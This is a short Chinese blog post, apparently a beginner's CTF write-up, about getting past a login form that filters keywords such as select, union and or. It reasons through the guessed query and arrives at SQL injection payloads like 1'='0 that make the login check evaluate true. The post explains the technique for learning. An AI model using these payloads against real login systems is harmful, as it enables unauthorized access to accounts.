根据提示：

不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!

我们可以知道有些关键词，符号被过滤了，我们先看看那些被过滤了

我们可以发现select # - union or 等被过滤了则尝试下面sql语句

1‘ and ‘1‘=‘1

1‘ and ‘1‘=‘1

我们猜测sql语句结构为：

select * from user where username = ‘1‘ and ‘1‘=‘1‘ and password = ‘1‘ and ‘1‘=‘1‘

我们发现上面四段用三个and连接，要想通过，必须4段都为True，所以报错

我们再次构造sql

1‘ = ‘1‘

1‘ = ‘1‘

select * from user where username = ‘1‘=‘1‘ and password = ‘1‘=‘1‘

还是报错，因为第一个红色中没有为1的username所以返回0 ，‘0‘ = ‘1‘ 为0所以返回0 下一个and不用执行直接报错

由上分析可知，我们可以构造‘0‘ = ‘0‘ and ‘0‘ = ‘0‘即可

要想0 = 0需要

select * from user where username = ‘1‘=‘0‘ and password = ‘1‘=‘0‘

1‘=‘0

1‘=‘0

即可

本人也是初学者，有什么错误的地方，希望大家指出，谢谢！

本文出自 “11846238” 博客，请务必保留此出处http://11856238.blog.51cto.com/11846238/1947298

1.登陆一下好吗？？